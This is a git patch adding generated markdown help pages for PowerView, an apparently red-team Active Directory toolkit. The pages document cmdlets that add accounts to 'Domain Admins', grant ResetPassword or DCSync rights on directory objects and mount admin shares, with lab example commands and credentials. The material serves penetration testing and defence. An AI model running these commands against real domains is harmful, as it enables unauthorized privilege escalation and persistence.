From 0aaa23cd8656f0b92f2fac3cd8e6be68eed7d809 Mon Sep 17 00:00:00 2001 
From: HarmJ0y Date: Mon, 12 Dec 2016 21:05:08 -0500 Subject: first take at platyPS doc generation --- docs/Recon/Add-DomainGroupMember.md | 142 +++++ docs/Recon/Add-DomainObjectAcl.md | 361 +++++++++++++ docs/Recon/Add-RemoteConnection.md | 114 ++++ docs/Recon/Convert-ADName.md | 184 +++++++ docs/Recon/ConvertFrom-SID.md | 126 +++++ docs/Recon/ConvertFrom-UACValue.md | 127 +++++ docs/Recon/ConvertTo-SID.md | 120 +++++ docs/Recon/Export-PowerViewCSV.md | 117 +++++ docs/Recon/Find-DomainLocalGroupMember.md | 351 +++++++++++++ docs/Recon/Find-DomainObjectPropertyOutlier.md | 261 ++++++++++ docs/Recon/Find-DomainProcess.md | 517 ++++++++++++++++++ docs/Recon/Find-DomainShare.md | 335 ++++++++++++ docs/Recon/Find-DomainUserEvent.md | 451 ++++++++++++++++ docs/Recon/Find-DomainUserLocation.md | 579 +++++++++++++++++++++ docs/Recon/Find-InterestingDomainAcl.md | 239 +++++++++ docs/Recon/Find-InterestingDomainShareFile.md | 463 ++++++++++++++++ docs/Recon/Find-InterestingFile.md | 248 +++++++++ docs/Recon/Find-LocalAdminAccess.md | 337 ++++++++++++ docs/Recon/Get-ComputerDetails.md | 68 +++ docs/Recon/Get-Domain.md | 81 +++ docs/Recon/Get-DomainComputer.md | 426 +++++++++++++++ docs/Recon/Get-DomainController.md | 132 +++++ docs/Recon/Get-DomainDFSShare.md | 202 +++++++ docs/Recon/Get-DomainDNSRecord.md | 181 +++++++ docs/Recon/Get-DomainDNSZone.md | 156 ++++++ docs/Recon/Get-DomainFileServer.md | 200 +++++++ docs/Recon/Get-DomainForeignGroupMember.md | 238 +++++++++ docs/Recon/Get-DomainForeignUser.md | 239 +++++++++ docs/Recon/Get-DomainGPO.md | 354 +++++++++++++ .../Get-DomainGPOComputerLocalGroupMapping.md | 263 ++++++++++ docs/Recon/Get-DomainGPOLocalGroup.md | 259 +++++++++ docs/Recon/Get-DomainGPOUserLocalGroupMapping.md | 258 +++++++++ docs/Recon/Get-DomainGroup.md | 397 ++++++++++++++ docs/Recon/Get-DomainGroupMember.md | 401 ++++++++++++++ docs/Recon/Get-DomainManagedSecurityGroup.md | 177 +++++++ docs/Recon/Get-DomainOU.md | 316 +++++++++++ 
docs/Recon/Get-DomainObject.md | 318 +++++++++++ docs/Recon/Get-DomainObjectAcl.md | 251 +++++++++ docs/Recon/Get-DomainPolicy.md | 159 ++++++ docs/Recon/Get-DomainSID.md | 102 ++++ docs/Recon/Get-DomainSPNTicket.md | 136 +++++ docs/Recon/Get-DomainSite.md | 309 +++++++++++ docs/Recon/Get-DomainSubnet.md | 309 +++++++++++ docs/Recon/Get-DomainTrust.md | 250 +++++++++ docs/Recon/Get-DomainTrustMapping.md | 220 ++++++++ docs/Recon/Get-DomainUser.md | 426 +++++++++++++++ docs/Recon/Get-DomainUserEvent.md | 144 +++++ docs/Recon/Get-Forest.md | 80 +++ docs/Recon/Get-ForestDomain.md | 82 +++ docs/Recon/Get-ForestGlobalCatalog.md | 78 +++ docs/Recon/Get-ForestTrust.md | 91 ++++ docs/Recon/Get-HttpStatus.md | 106 ++++ docs/Recon/Get-NetComputerSiteName.md | 89 ++++ docs/Recon/Get-NetLocalGroup.md | 132 +++++ docs/Recon/Get-NetLocalGroupMember.md | 212 ++++++++ docs/Recon/Get-NetLoggedon.md | 100 ++++ docs/Recon/Get-NetRDPSession.md | 104 ++++ docs/Recon/Get-NetSession.md | 99 ++++ docs/Recon/Get-NetShare.md | 100 ++++ docs/Recon/Get-PathAcl.md | 94 ++++ docs/Recon/Get-RegLoggedOn.md | 89 ++++ docs/Recon/Get-WMIProcess.md | 80 +++ docs/Recon/Get-WMIRegCachedRDPConnection.md | 99 ++++ docs/Recon/Get-WMIRegLastLoggedOn.md | 98 ++++ docs/Recon/Get-WMIRegMountedDrive.md | 97 ++++ docs/Recon/Get-WMIRegProxy.md | 93 ++++ docs/Recon/Invoke-Kerberoast.md | 233 +++++++++ docs/Recon/Invoke-Portscan.md | 430 +++++++++++++++ docs/Recon/Invoke-ReverseDnsLookup.md | 106 ++++ docs/Recon/Invoke-RevertToSelf.md | 56 ++ docs/Recon/Invoke-UserImpersonation.md | 100 ++++ docs/Recon/New-DomainGroup.md | 150 ++++++ docs/Recon/New-DomainUser.md | 184 +++++++ docs/Recon/Remove-RemoteConnection.md | 84 +++ docs/Recon/Resolve-IPAddress.md | 66 +++ docs/Recon/Set-DomainObject.md | 346 ++++++++++++ docs/Recon/Test-AdminAccess.md | 101 ++++ 77 files changed, 15823 insertions(+) create mode 100755 docs/Recon/Add-DomainGroupMember.md create mode 100755 docs/Recon/Add-DomainObjectAcl.md create mode 100755 
docs/Recon/Add-RemoteConnection.md create mode 100755 docs/Recon/Convert-ADName.md create mode 100755 docs/Recon/ConvertFrom-SID.md create mode 100755 docs/Recon/ConvertFrom-UACValue.md create mode 100755 docs/Recon/ConvertTo-SID.md create mode 100755 docs/Recon/Export-PowerViewCSV.md create mode 100755 docs/Recon/Find-DomainLocalGroupMember.md create mode 100755 docs/Recon/Find-DomainObjectPropertyOutlier.md create mode 100755 docs/Recon/Find-DomainProcess.md create mode 100755 docs/Recon/Find-DomainShare.md create mode 100755 docs/Recon/Find-DomainUserEvent.md create mode 100755 docs/Recon/Find-DomainUserLocation.md create mode 100755 docs/Recon/Find-InterestingDomainAcl.md create mode 100755 docs/Recon/Find-InterestingDomainShareFile.md create mode 100755 docs/Recon/Find-InterestingFile.md create mode 100755 docs/Recon/Find-LocalAdminAccess.md create mode 100755 docs/Recon/Get-ComputerDetails.md create mode 100755 docs/Recon/Get-Domain.md create mode 100755 docs/Recon/Get-DomainComputer.md create mode 100755 docs/Recon/Get-DomainController.md create mode 100755 docs/Recon/Get-DomainDFSShare.md create mode 100755 docs/Recon/Get-DomainDNSRecord.md create mode 100755 docs/Recon/Get-DomainDNSZone.md create mode 100755 docs/Recon/Get-DomainFileServer.md create mode 100755 docs/Recon/Get-DomainForeignGroupMember.md create mode 100755 docs/Recon/Get-DomainForeignUser.md create mode 100755 docs/Recon/Get-DomainGPO.md create mode 100755 docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md create mode 100755 docs/Recon/Get-DomainGPOLocalGroup.md create mode 100755 docs/Recon/Get-DomainGPOUserLocalGroupMapping.md create mode 100755 docs/Recon/Get-DomainGroup.md create mode 100755 docs/Recon/Get-DomainGroupMember.md create mode 100755 docs/Recon/Get-DomainManagedSecurityGroup.md create mode 100755 docs/Recon/Get-DomainOU.md create mode 100755 docs/Recon/Get-DomainObject.md create mode 100755 docs/Recon/Get-DomainObjectAcl.md create mode 100755 docs/Recon/Get-DomainPolicy.md 
create mode 100755 docs/Recon/Get-DomainSID.md create mode 100755 docs/Recon/Get-DomainSPNTicket.md create mode 100755 docs/Recon/Get-DomainSite.md create mode 100755 docs/Recon/Get-DomainSubnet.md create mode 100755 docs/Recon/Get-DomainTrust.md create mode 100755 docs/Recon/Get-DomainTrustMapping.md create mode 100755 docs/Recon/Get-DomainUser.md create mode 100755 docs/Recon/Get-DomainUserEvent.md create mode 100755 docs/Recon/Get-Forest.md create mode 100755 docs/Recon/Get-ForestDomain.md create mode 100755 docs/Recon/Get-ForestGlobalCatalog.md create mode 100755 docs/Recon/Get-ForestTrust.md create mode 100755 docs/Recon/Get-HttpStatus.md create mode 100755 docs/Recon/Get-NetComputerSiteName.md create mode 100755 docs/Recon/Get-NetLocalGroup.md create mode 100755 docs/Recon/Get-NetLocalGroupMember.md create mode 100755 docs/Recon/Get-NetLoggedon.md create mode 100755 docs/Recon/Get-NetRDPSession.md create mode 100755 docs/Recon/Get-NetSession.md create mode 100755 docs/Recon/Get-NetShare.md create mode 100755 docs/Recon/Get-PathAcl.md create mode 100755 docs/Recon/Get-RegLoggedOn.md create mode 100755 docs/Recon/Get-WMIProcess.md create mode 100755 docs/Recon/Get-WMIRegCachedRDPConnection.md create mode 100755 docs/Recon/Get-WMIRegLastLoggedOn.md create mode 100755 docs/Recon/Get-WMIRegMountedDrive.md create mode 100755 docs/Recon/Get-WMIRegProxy.md create mode 100755 docs/Recon/Invoke-Kerberoast.md create mode 100755 docs/Recon/Invoke-Portscan.md create mode 100755 docs/Recon/Invoke-ReverseDnsLookup.md create mode 100755 docs/Recon/Invoke-RevertToSelf.md create mode 100755 docs/Recon/Invoke-UserImpersonation.md create mode 100755 docs/Recon/New-DomainGroup.md create mode 100755 docs/Recon/New-DomainUser.md create mode 100755 docs/Recon/Remove-RemoteConnection.md create mode 100755 docs/Recon/Resolve-IPAddress.md create mode 100755 docs/Recon/Set-DomainObject.md create mode 100755 docs/Recon/Test-AdminAccess.md (limited to 'docs') 
diff --git a/docs/Recon/Add-DomainGroupMember.md b/docs/Recon/Add-DomainGroupMember.md new file mode 100755 index 0000000..cc563e9 --- /dev/null +++ b/docs/Recon/Add-DomainGroupMember.md 
@@ -0,0 +1,142 @@ +# Add-DomainGroupMember + +## SYNOPSIS +Adds a domain user (or group) to an existing domain group, assuming +appropriate permissions to do so. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +Add-DomainGroupMember [-Identity] -Members [-Domain ] [-Credential ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified -GroupIdentity, +which returns a DirectoryServices.AccountManagement.GroupPrincipal object. +For +each entry in -Members, each member identity is similarly searched for and added +to the group. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' +``` + +Adds harmj0y to 'Domain Admins' in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred + +Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +## PARAMETERS + +### -Identity +A group SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to add members to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: GroupName, GroupIdentity + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Members +One or more member identities, i.e. +SamAccountName (e.g. +Group1), DistinguishedName +(e.g. +CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), +or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202). + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: MemberIdentity, Member, DistinguishedName + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/) + diff --git a/docs/Recon/Add-DomainObjectAcl.md b/docs/Recon/Add-DomainObjectAcl.md new file mode 100755 index 0000000..c530e81 --- /dev/null +++ b/docs/Recon/Add-DomainObjectAcl.md 
@@ -0,0 +1,361 @@ +# Add-DomainObjectAcl + +## SYNOPSIS +Adds an ACL for a specific active directory object. + +AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906 + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +## SYNTAX + +``` +Add-DomainObjectAcl [[-TargetIdentity] ] [-TargetDomain ] [-TargetLDAPFilter ] + [-TargetSearchBase ] -PrincipalIdentity [-PrincipalDomain ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] [-Rights ] [-RightsGUID ] +``` + +## DESCRIPTION +This function modifies the ACL/ACE entries for a given Active Directory +target object specified by -TargetIdentity. +Available -Rights are +'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended +rights GUID can be set with -RightsGUID. +These rights are granted on the target +object for the specified -PrincipalIdentity. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +``` + +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +... 
+ +Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string:(&(|(samAccountName=dfm.a))) +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +``` + +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +\[no results returned\] + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainObjectAcl 
-TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose +VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain +VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y)))) +VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain +VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +## 
PARAMETERS + +### -TargetIdentity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain object to modify ACLs for. +Required. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -TargetDomain +Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TargetLDAPFilter +Specifies an LDAP query string that is used to filter Active Directory object targets. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TargetSearchBase +The LDAP source to search through for targets, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PrincipalIdentity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. +Required. +Wildcards accepted. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PrincipalDomain +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Rights +Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'. +Defaults to 'All'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: All +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RightsGUID +Manual GUID representing the right to add to the target. + +```yaml +Type: Guid +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[https://adsecurity.org/?p=1906 +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell](https://adsecurity.org/?p=1906 +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell) + diff --git a/docs/Recon/Add-RemoteConnection.md b/docs/Recon/Add-RemoteConnection.md new file mode 100755 index 0000000..86112e2 --- /dev/null +++ b/docs/Recon/Add-RemoteConnection.md 
@@ -0,0 +1,114 @@ +# Add-RemoteConnection + +## SYNOPSIS +Pseudo "mounts" a connection to a remote path using the specified +credential object, allowing for access of remote resources. +If a -Path isn't +specified, a -ComputerName is required to pseudo-mount IPC$. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +### ComputerName (Default) +``` +Add-RemoteConnection [-ComputerName] -Credential +``` + +### Path +``` +Add-RemoteConnection [-Path] -Credential +``` + +## DESCRIPTION +This function uses WNetAddConnection2W to make a 'temporary' (i.e. +not saved) connection +to the specified remote -Path (\\\\UNC\share) with the alternate credentials specified in the +-Credential object. +If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$. + +To destroy the connection, use Remove-RemoteConnection with the same specified \\\\UNC\share path +or -ComputerName. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Cred = Get-Credential +``` + +Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-RemoteConnection -Path '\\\\PRIMARY.testlab.local\C$\' -Credential $Cred + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$Cred = Get-Credential +``` + +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the system to add a \\\\ComputerName\IPC$ connection for. 
+ +```yaml +Type: String[] +Parameter Sets: ComputerName +Aliases: HostName, dnshostname, name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the remote \\\\UNC\path to add the connection for. + +```yaml +Type: String[] +Parameter Sets: Path +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Convert-ADName.md b/docs/Recon/Convert-ADName.md new file mode 100755 index 0000000..7f9f42b --- /dev/null +++ b/docs/Recon/Convert-ADName.md 
@@ -0,0 +1,184 @@ +# Convert-ADName + +## SYNOPSIS +Converts Active Directory object names between a variety of formats. + +Author: Bill Stewart, Pasquale Lantella +Modifications: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Convert-ADName [-Identity] [[-OutputType] ] [[-Domain] ] [[-Server] ] + [[-Credential] ] +``` + +## DESCRIPTION +This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK) +and translates Active Directory names between various formats using the NameTranslate COM object. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Convert-ADName -Identity "TESTLAB\harmj0y" +``` + +harmj0y@testlab.local + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical +``` + +testlab.local/Users/krbtgt +testlab.local/Users/Administrator + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local +``` + +CN=harmj0y,CN=Users,DC=testlab,DC=local + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred + +TESTLAB\harmj0y + +## PARAMETERS + +### -Identity +Specifies the Active Directory object name to translate, of the following form: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. +'pflynn' + DomainSimple simple domain name format, e.g. 
+'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. +'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format + SPN service principal name format; e.g. +'HTTP/kairomac.contoso.com' + SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999' + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name, ObjectName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -OutputType +Specifies the output name type you want to convert to, which must be one of the following: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. +'pflynn' + DomainSimple simple domain name format, e.g. +'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. +'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format, e.g. +'fabrikam.com/Users/Phineas Flynn' + SPN service principal name format; e.g. +'HTTP/kairomac.contoso.com' + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the translation, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the translation. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +Specifies an alternate credential to use for the translation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more objects name strings on the pipeline. + +## OUTPUTS + +### String + +Outputs a string representing the converted name. + +## NOTES + +## RELATED LINKS + +[http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67](http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67) + diff --git 